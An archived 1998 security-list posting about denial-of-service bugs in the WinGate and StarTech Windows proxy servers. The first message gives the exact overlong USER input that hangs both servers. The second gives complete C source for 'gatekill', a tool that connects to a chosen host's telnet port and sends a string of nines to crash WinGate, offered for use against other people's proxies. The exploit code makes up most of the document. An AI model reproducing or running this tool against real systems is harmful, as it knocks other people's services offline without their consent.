Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: winproxy.txt

Windows Proxy servers WinGate and StarTech contain buffer overflows.





[ http://www.rootshell.com/ ]

Date:         Thu, 2 Jul 1998 20:37:32 -0500
From:         Ryan Nichols <ryann@THE-BRIDGE.NET>
Subject:      Windows95 Proxy DoS Vulnerabilites

While playing with a proxy server the other day, I have accidently stumbled
across two remote bugs in numerous proxy servers. Those affected are
"WinGate and StarTech". Both companies have been previously notified of
their vulnerability, and in WinGate's case I guess it has been patched
already.

The bug is pretty straight forward, telnet to the proxy server at its
pop3 port and type

For WinGate:
    USER x#99999.....

    With lots of nine's, the proxy server stops responding and needs to
be restarted.

For Startech:
     USER x<9999999.....>

      Once again, as many nines as possible, startech quits responding.

In Startech's case, this can also be done in the telnet daemon part of
it also...

Havent tried much others...

My Startech proxy server did not have a version number on it, and the
Wingate's wasn't available. Sorry, I will try to get this in tommarrow
if neccessary...


    -Ryan
     (ryann@the-bridge.net / http://www.the-bridge.net/~ryann)

----------------------------------------------------------------------------

From roberts@nep.net Sun Jul 19 08:52:10 1998
Date: Sat, 18 Jul 1998 13:27:18 -0400
From: Matt <roberts@nep.net>
To: www-request@rootshell.com
Subject: WinGate instant killer.

I'm not much into DoS shit.  And I got sick of people using wingates for
the wrong reasons.  Here is C source code to instantly kill a wingate
and thats it.  It doesnt affect anything else.

<<<<<<<<<< Begin cutting here:
/*
 *  gatekill.c - coded by technics
 *             exploit by elph
 *
 *  will instantly kill a wingate, but
 *  won't kill the whole box/connection.
 *
 *  yes, quite lame to some, and then quite
 *  cool to the lame.  Used when people abuse
 *  wingate.  It only kills the wingate, not
 *  the whole box, so I think that makes up
 *  the cool part out of the lame part.
 *
 *  usage: ./winkill <server>
 *  compile:  gcc -o gatekill gatekill.c
 *
 *  hmmmm, well, it seems that it doesn't work
 *  on all wingates.  That sucks.  But not many
 *  people have the patched one.  If you don't
 *  want this happening to you, upgrade.
 *
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void main(int argc, char **argv) {
  int sock;
  char b00m[2024];
  struct sockaddr_in host;
  struct hostent *hr;

  if(argc < 2) {
    printf("command line error - usage:\n");
    printf("\t\t %s <server>\n", argv[0]);
    return;
  }

  if((hr = gethostbyname(argv[1])) == NULL) {
    printf("unable to resolve host %s\n", argv[1]);
    printf("quiting...\n");
    return;
  }

  bzero((char *) &host, sizeof(host));
  bcopy(hr->h_addr, (char *) &host.sin_addr, hr->h_length);
  host.sin_family = hr->h_addrtype;
  host.sin_port = htons(23);

  if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
    printf("unable to create socket.\n");
    printf("quiting...\n");
    return;
  }

  if((connect(sock, (struct sockaddr *) &host, sizeof(host))) < 0) {
   printf("unable to connect to server %s\n", argv[1]);
   printf("quiting...\n");
   return;
  }


sprintf(b00m,"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
110");

  if((send(sock, b00m, strlen(b00m), 0)) < 0) {
    printf("unable to send the kill string\n");
    printf("quiting...\n");
    return;
  }

  printf("\tKill string sent, wingate should have been successfully
killed..\n");
  printf("\twinkill.c coded by technics, exploit by elph.  Gotta love it
when\n");
  printf("\tyou don't gotta code your own exploit.\n");
  close(sock);
}
<<<<<<< stop cutting here.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH